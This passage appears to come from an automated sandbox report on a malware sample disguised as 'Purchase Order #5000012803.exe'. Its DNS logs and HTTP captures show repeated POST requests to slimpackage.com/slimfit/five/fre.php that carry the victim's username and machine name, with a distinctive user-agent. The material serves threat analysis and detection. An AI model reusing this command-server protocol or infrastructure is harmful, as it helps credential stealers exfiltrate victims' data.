                    Jan 14, 2022 07:15:25.640181065 CET4991053192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:25.659820080 CET53499108.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:27.444946051 CET5585453192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:27.465480089 CET53558548.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:28.851008892 CET6454953192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:28.868638039 CET53645498.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:30.184693098 CET6315353192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:30.321918011 CET53631538.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:31.672205925 CET5299153192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:31.691579103 CET53529918.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:32.955732107 CET5370053192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:32.973172903 CET53537008.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:35.246782064 CET5172653192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:35.266144037 CET53517268.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:37.634501934 CET5653453192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:37.653927088 CET53565348.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:40.166773081 CET5662753192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:40.183775902 CET53566278.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:43.041888952 CET5662153192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:43.060411930 CET53566218.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:44.537666082 CET6311653192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:44.557122946 CET53631168.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:46.131236076 CET6407853192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:46.151381969 CET53640788.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:48.529268980 CET6480153192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:48.548661947 CET53648018.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:51.134810925 CET6172153192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:51.152173042 CET53617218.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:52.762025118 CET5125553192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:52.781132936 CET53512558.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:54.234880924 CET6152253192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:54.254149914 CET53615228.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:56.255400896 CET5233753192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:56.274619102 CET53523378.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:58.575176954 CET5504653192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:58.596236944 CET53550468.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:01.477211952 CET4961253192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:01.496733904 CET53496128.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:03.121555090 CET4928553192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:03.140244961 CET53492858.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:04.371279001 CET5060153192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:04.390710115 CET53506018.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:05.685066938 CET6087553192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:05.704754114 CET53608758.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:07.156482935 CET5917253192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:07.174711943 CET53591728.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:08.679229021 CET4922853192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:08.697597027 CET53492288.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:11.928960085 CET6054253192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:11.948059082 CET53605428.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:14.001940966 CET6068953192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:14.020950079 CET53606898.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:17.261699915 CET6420653192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:17.279268026 CET53642068.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:20.238981962 CET5090453192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:20.259481907 CET53509048.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:24.393260956 CET5381453192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:24.411359072 CET53538148.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:28.115921021 CET5341853192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:28.133634090 CET53534188.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:30.577742100 CET6283353192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:30.594938993 CET53628338.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:32.866368055 CET5926053192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:32.886065960 CET53592608.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:34.589356899 CET4994453192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:34.606406927 CET53499448.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:36.625505924 CET6330053192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:36.645319939 CET53633008.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:38.657772064 CET6144953192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:38.675271034 CET53614498.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:39.971518993 CET5127553192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:39.991748095 CET53512758.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:41.312222004 CET6349253192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:41.331799030 CET53634928.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:43.229424953 CET5894553192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:43.249593019 CET53589458.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:46.364284992 CET6077953192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:46.383768082 CET53607798.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:48.917032003 CET6401453192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:48.936470032 CET53640148.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:50.913182020 CET5709153192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:50.931972980 CET53570918.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:52.900542974 CET5590453192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:52.919825077 CET53559048.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:55.037755013 CET5210953192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:55.058094978 CET53521098.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:56.862276077 CET5445053192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:56.881892920 CET53544508.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:58.180952072 CET4937453192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:58.200124025 CET53493748.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:59.790585995 CET5043653192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:59.809870958 CET53504368.8.8.8192.168.2.4
                    Jan 14, 2022 07:17:01.058151960 CET6260553192.168.2.48.8.8.8
                    Jan 14, 2022 07:17:01.075694084 CET53626058.8.8.8192.168.2.4
                    Jan 14, 2022 07:17:02.385804892 CET5425653192.168.2.48.8.8.8
                    Jan 14, 2022 07:17:02.405262947 CET53542568.8.8.8192.168.2.4
                    Jan 14, 2022 07:17:03.775289059 CET5218953192.168.2.48.8.8.8
                    Jan 14, 2022 07:17:03.794727087 CET53521898.8.8.8192.168.2.4
                    Jan 14, 2022 07:17:05.055073023 CET5613153192.168.2.48.8.8.8
                    Jan 14, 2022 07:17:05.074599981 CET53561318.8.8.8192.168.2.4
                    Jan 14, 2022 07:17:06.411191940 CET6299253192.168.2.48.8.8.8
                    Jan 14, 2022 07:17:06.430692911 CET53629928.8.8.8192.168.2.4
                    Jan 14, 2022 07:17:07.722347021 CET5443253192.168.2.48.8.8.8
                    Jan 14, 2022 07:17:07.742001057 CET53544328.8.8.8192.168.2.4
                    Jan 14, 2022 07:17:09.254395008 CET5722753192.168.2.48.8.8.8
                    Jan 14, 2022 07:17:09.274477959 CET53572278.8.8.8192.168.2.4
                    Jan 14, 2022 07:17:11.775614977 CET5838353192.168.2.48.8.8.8
                    Jan 14, 2022 07:17:11.796473026 CET53583838.8.8.8192.168.2.4

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                    Jan 14, 2022 07:15:13.903927088 CET192.168.2.48.8.8.80x6a62Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:15.528506994 CET192.168.2.48.8.8.80x6b83Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:16.862633944 CET192.168.2.48.8.8.80x621eStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:18.142127991 CET192.168.2.48.8.8.80x4eedStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:19.516477108 CET192.168.2.48.8.8.80x7991Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:21.174777031 CET192.168.2.48.8.8.80x947aStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:24.109755039 CET192.168.2.48.8.8.80xfde1Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:25.640181065 CET192.168.2.48.8.8.80xa848Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:27.444946051 CET192.168.2.48.8.8.80xb509Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:28.851008892 CET192.168.2.48.8.8.80x370bStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:30.184693098 CET192.168.2.48.8.8.80x15ffStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:31.672205925 CET192.168.2.48.8.8.80xf55fStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:32.955732107 CET192.168.2.48.8.8.80x97c1Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:35.246782064 CET192.168.2.48.8.8.80xe66Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:37.634501934 CET192.168.2.48.8.8.80xc3e3Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:40.166773081 CET192.168.2.48.8.8.80xee78Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:43.041888952 CET192.168.2.48.8.8.80x394eStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:44.537666082 CET192.168.2.48.8.8.80x1de5Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:46.131236076 CET192.168.2.48.8.8.80xf757Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:48.529268980 CET192.168.2.48.8.8.80x448cStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:51.134810925 CET192.168.2.48.8.8.80x332Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:52.762025118 CET192.168.2.48.8.8.80xb8a0Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:54.234880924 CET192.168.2.48.8.8.80xaa34Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:56.255400896 CET192.168.2.48.8.8.80x5472Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:58.575176954 CET192.168.2.48.8.8.80xc43fStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:01.477211952 CET192.168.2.48.8.8.80xeff0Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:03.121555090 CET192.168.2.48.8.8.80xa14aStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:04.371279001 CET192.168.2.48.8.8.80xf5beStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:05.685066938 CET192.168.2.48.8.8.80x2b37Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:07.156482935 CET192.168.2.48.8.8.80x6624Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:08.679229021 CET192.168.2.48.8.8.80xa227Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:11.928960085 CET192.168.2.48.8.8.80x18e5Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:14.001940966 CET192.168.2.48.8.8.80x17e7Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:17.261699915 CET192.168.2.48.8.8.80xede4Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:20.238981962 CET192.168.2.48.8.8.80x7b1bStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:24.393260956 CET192.168.2.48.8.8.80x93a3Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:28.115921021 CET192.168.2.48.8.8.80x204eStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:30.577742100 CET192.168.2.48.8.8.80x6cf1Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:32.866368055 CET192.168.2.48.8.8.80x2008Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:34.589356899 CET192.168.2.48.8.8.80x29f7Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:36.625505924 CET192.168.2.48.8.8.80x50f4Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:38.657772064 CET192.168.2.48.8.8.80xb6d1Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:39.971518993 CET192.168.2.48.8.8.80x2d24Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:41.312222004 CET192.168.2.48.8.8.80xa7d6Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:43.229424953 CET192.168.2.48.8.8.80x36c1Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:46.364284992 CET192.168.2.48.8.8.80x986bStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:48.917032003 CET192.168.2.48.8.8.80x9e13Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:50.913182020 CET192.168.2.48.8.8.80x51d7Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:52.900542974 CET192.168.2.48.8.8.80xad8dStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:55.037755013 CET192.168.2.48.8.8.80x91edStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:56.862276077 CET192.168.2.48.8.8.80x6ebStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:58.180952072 CET192.168.2.48.8.8.80x31c9Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:59.790585995 CET192.168.2.48.8.8.80x80a5Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:01.058151960 CET192.168.2.48.8.8.80x82b6Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:02.385804892 CET192.168.2.48.8.8.80x21b4Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:03.775289059 CET192.168.2.48.8.8.80x6489Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:05.055073023 CET192.168.2.48.8.8.80x6afStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:06.411191940 CET192.168.2.48.8.8.80xfd66Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:07.722347021 CET192.168.2.48.8.8.80x85eeStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:09.254395008 CET192.168.2.48.8.8.80x5702Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:11.775614977 CET192.168.2.48.8.8.80x562fStandard query (0)slimpackage.comA (IP address)IN (0x0001)

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                    Jan 14, 2022 07:15:13.923434973 CET8.8.8.8192.168.2.40x6a62No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:15.647453070 CET8.8.8.8192.168.2.40x6b83No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:16.881752014 CET8.8.8.8192.168.2.40x621eNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:18.261272907 CET8.8.8.8192.168.2.40x4eedNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:19.535804987 CET8.8.8.8192.168.2.40x7991No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:21.194984913 CET8.8.8.8192.168.2.40x947aNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:24.226423979 CET8.8.8.8192.168.2.40xfde1No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:25.659820080 CET8.8.8.8192.168.2.40xa848No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:27.465480089 CET8.8.8.8192.168.2.40xb509No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:28.868638039 CET8.8.8.8192.168.2.40x370bNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:30.321918011 CET8.8.8.8192.168.2.40x15ffNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:31.691579103 CET8.8.8.8192.168.2.40xf55fNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:32.973172903 CET8.8.8.8192.168.2.40x97c1No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:35.266144037 CET8.8.8.8192.168.2.40xe66No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:37.653927088 CET8.8.8.8192.168.2.40xc3e3No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:40.183775902 CET8.8.8.8192.168.2.40xee78No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:43.060411930 CET8.8.8.8192.168.2.40x394eNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:44.557122946 CET8.8.8.8192.168.2.40x1de5No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:46.151381969 CET8.8.8.8192.168.2.40xf757No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:48.548661947 CET8.8.8.8192.168.2.40x448cNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:51.152173042 CET8.8.8.8192.168.2.40x332No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:52.781132936 CET8.8.8.8192.168.2.40xb8a0No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:54.254149914 CET8.8.8.8192.168.2.40xaa34No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:56.274619102 CET8.8.8.8192.168.2.40x5472No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:58.596236944 CET8.8.8.8192.168.2.40xc43fNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:01.496733904 CET8.8.8.8192.168.2.40xeff0No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:03.140244961 CET8.8.8.8192.168.2.40xa14aNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:04.390710115 CET8.8.8.8192.168.2.40xf5beNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:05.704754114 CET8.8.8.8192.168.2.40x2b37No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:07.174711943 CET8.8.8.8192.168.2.40x6624No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:08.697597027 CET8.8.8.8192.168.2.40xa227No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:11.948059082 CET8.8.8.8192.168.2.40x18e5No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:14.020950079 CET8.8.8.8192.168.2.40x17e7No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:17.279268026 CET8.8.8.8192.168.2.40xede4No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:20.259481907 CET8.8.8.8192.168.2.40x7b1bNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:24.411359072 CET8.8.8.8192.168.2.40x93a3No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:28.133634090 CET8.8.8.8192.168.2.40x204eNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:30.594938993 CET8.8.8.8192.168.2.40x6cf1No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:32.886065960 CET8.8.8.8192.168.2.40x2008No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:34.606406927 CET8.8.8.8192.168.2.40x29f7No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:36.645319939 CET8.8.8.8192.168.2.40x50f4No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:38.675271034 CET8.8.8.8192.168.2.40xb6d1No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:39.991748095 CET8.8.8.8192.168.2.40x2d24No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:41.331799030 CET8.8.8.8192.168.2.40xa7d6No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:43.249593019 CET8.8.8.8192.168.2.40x36c1No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:46.383768082 CET8.8.8.8192.168.2.40x986bNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:48.936470032 CET8.8.8.8192.168.2.40x9e13No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:50.931972980 CET8.8.8.8192.168.2.40x51d7No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:52.919825077 CET8.8.8.8192.168.2.40xad8dNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:55.058094978 CET8.8.8.8192.168.2.40x91edNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:56.881892920 CET8.8.8.8192.168.2.40x6ebNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:58.200124025 CET8.8.8.8192.168.2.40x31c9No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:59.809870958 CET8.8.8.8192.168.2.40x80a5No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:01.075694084 CET8.8.8.8192.168.2.40x82b6No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:02.405262947 CET8.8.8.8192.168.2.40x21b4No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:03.794727087 CET8.8.8.8192.168.2.40x6489No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:05.074599981 CET8.8.8.8192.168.2.40x6afNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:06.430692911 CET8.8.8.8192.168.2.40xfd66No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:07.742001057 CET8.8.8.8192.168.2.40x85eeNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:09.274477959 CET8.8.8.8192.168.2.40x5702No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:11.796473026 CET8.8.8.8192.168.2.40x562fNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)

                    HTTP Request Dependency Graph

                    • slimpackage.com

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.449765104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:14.068203926 CET1148OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 190
                    Connection: close
                    Jan 14, 2022 07:15:14.192487955 CET1148OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: 'ckav.rujones247525DESKTOP-716T771k08F9C4E9C79A3B52B3F739430HiCiQ
                    Jan 14, 2022 07:15:14.326773882 CET1149INHTTP/1.1 404 Not Found
                    Date: Fri, 14 Jan 2022 06:15:13 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    1192.168.2.449766104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:15.774785995 CET1150OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 190
                    Connection: close
                    Jan 14, 2022 07:15:15.897516012 CET1246OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: 'ckav.rujones247525DESKTOP-716T771+08F9C4E9C79A3B52B3F739430KHSzU
                    Jan 14, 2022 07:15:16.029309988 CET1246INHTTP/1.1 404 Not Found
                    Date: Fri, 14 Jan 2022 06:15:14 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    10192.168.2.449775104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:30.454418898 CET1345OUTPOST /slimfit/five/fre.php HTTP/1.0
